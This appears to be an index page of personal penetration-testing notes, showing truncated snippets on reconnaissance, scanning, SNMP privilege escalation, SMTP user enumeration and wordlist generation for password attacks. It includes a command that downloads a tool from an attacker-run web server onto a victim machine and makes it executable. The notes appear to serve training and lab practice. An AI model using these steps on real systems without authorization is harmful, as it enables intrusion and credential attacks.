Shuciran Pentesting Notes

Local Web Server

Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....

User Enumeration Gathering

The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t works really well on newer versions of Kali, use the docker image if that is the case. docker run -ti --rm thehar...

Nikto

The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...

Search Engines

Shodan Shodan Search Engine for connected devices over the Internet. You can use various filters while using shodan, among others are: hostname port country Censys Censys Search Engine ...

SNMP Read and Write Community Abuse

SNMP Priv Escalation If port 161 is open internally you can search for the /etc/snmp/snmpd.conf file and review its content, notice that private community is read and writable: rocommunity public...

SMTP (tcp-25)

VRFY USER ENUMERATION With user and IP as input by the user: #!/usr/bin/python import socket import sys if len(sys.argv) != 3: print("Usage: vrfy.py <IP> <users_list>") ...

Netcat Port Scanning

TCP Scanning The -w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...

NETBIOS (tcp-139)

NBTSCAN nbtscan -r 10.11.1.0/24

Social Media

Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

Recon-ng

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...